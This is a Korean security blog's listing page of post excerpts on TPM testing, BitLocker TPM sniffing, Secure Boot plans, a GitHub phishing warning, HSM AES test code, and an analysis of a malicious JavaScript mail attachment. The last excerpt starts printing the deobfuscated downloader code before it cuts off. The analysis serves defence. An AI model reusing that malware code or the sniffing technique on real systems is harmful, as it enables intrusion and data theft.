본문 바로가기

보안9

tpm 키 테스트 tpm2_createprimary owner 결과 : 매 실행 동일, 재부팅 해도 동일 $ tpm2_createprimary -C o --key-algorithm=rsa -c prim.ctx name-alg: value: sha256 raw: 0xb attributes: value: fixedtpm|fixedparent|sensitivedataorigin|userwithauth|restricted|decrypt raw: 0x30072 type: value: rsa raw: 0x1 exponent: 65537 bits: 2048 scheme: value: null raw: 0x10 scheme-halg: value: (null) raw: 0x0 sym-alg: value: aes raw: 0x6 sym-m.. 2021. 8. 3.
TPM MITM 및 Sniffing 공격 가능성 Windows 의 Bitlocker는 기본적으로 TPM을 통해 암호키를 저장하여 하드디스크를 암호화 한다. 그렇기 때문에 HDD만 단독으로 다른 컴퓨터에 붙인다고 해서 디스크를 읽지 못한다. 하지만 이를 도난시 데이터 보호용으로는 사용할 수 없다. BitLocker가 TPM을 사용할 때 Parameter Encryption을 사용하지 않기 때문에 단순히 Logic Analyzer나 MCU를 통해 손쉽게 TPM의 통신 내용을 Sniffing 하여 Unseal 과정을 그대로 볼 수 있기 때문이다. 참고: https://developers.tpm.dev/posts/15883726 https://pulsesecurity.co.nz/articles/TPM-sniffing 이를 해결하기 위해 Parameter En.. 2021. 8. 3.
wip: Rock64에서 UEFI Secure Boot & TPM Measured Boot 한... 7월쯤 시작하게 될 것 같다. 계획은 아래와 같다. 1. UEFI Secure Boot & TPM 적용하여 U-Boot 빌드 - UEFI 및 Secure Boot을 활성화 : https://www.linaro.org/blog/enabling-uefi-secure-boot-on-u-boot/ - efi_loader에는 기본적으로 measured boot를 지원하는 것으로 보임 - rock64에 SLB9670(SPI)을 적용하는 패치 구현해야 함 - U-Boot에서 PK를 빌드타임에 고정할 수 있는지? 2. rock64 보드에서 SPI Flash에 U-Boot Bootloader를 설치하고 WP핀을 하드웨어적으로 Active하여 쓰기 방지 함. 3. Application Data 보호를 위해 IMA.. 2021. 5. 22.
github 피싱 메일 주의! github를 사칭한 피싱메일도 오네요.. 실제 제가 github에서 사용하고 있는 메일 주소로 아래와 같은 메일이 왔습니다. 디자인이 깔끔해서 진짜같네요...ㅎㅎ 링크를 클릭하면 두번째 사진 페이지로 갑니다. 그런데 아무렇게나 입력하면 비밀번호가 틀렸다고 나오네요.. 보통 피싱사이트를 보면 무조건 맞다고 하거나 진짜 페이지로 니동시키는데 그러진 않습니다. 실제로 정보를 확인하는 것 일수도요.. 암튼 이젠 계장탈취 뿐 아니라 소스까지 탐을 내나 봅니다.. 깃허브 피싱이라니.. 다들 조심하시길 바랍니다. 2020. 4. 5.
SafeNet 5110 AES Performance Test Test Code: import sun.security.pkcs11.SunPKCS11; import sun.security.pkcs11.wrapper.PKCS11; import sun.security.pkcs11.wrapper.PKCS11Exception; import javax.crypto.Cipher; import javax.crypto.KeyGenerator; import javax.crypto.SecretKey; import javax.security.auth.login.FailedLoginException; import java.io.IOException; import java.security.Key; import java.security.KeyStore; import java.security... 2020. 1. 23.
한국 메일로 유포되는 악성메일 분석 (JS/Obfus.S29) 얼마전부터 제 메일로 이상한 메일이 오고 있습니다.메일 송신자는 제 메일이고제목은 Scan4 / hi prnt 등의 제목이었습니다.그리고 이상한 zip파일이 첨부되어 있었습니다. 그 중 하나의 첨부파일 이름은SCAN004862814.zip압축을풀면 SCAN004862814.js 파일이 생성됩니다.해당 자바스크립트 파일을 실행하면 악성코드가 다운받아져서 실행됩니다. // 원본파일이름 : SCAN004862814.js// 원본파일md5 : 6576cd7c4ba8cb77ce3b23899139c27f// 진단명(Ahnlab) : JS/Obfus.S29 소스가 난독화 되어 있어 복잡하지만 분석하면 간단해집니다. // 실제 동작 소스 if(0){ var ohttp = new ActiveXObject("MSXML2... 2016. 4. 30.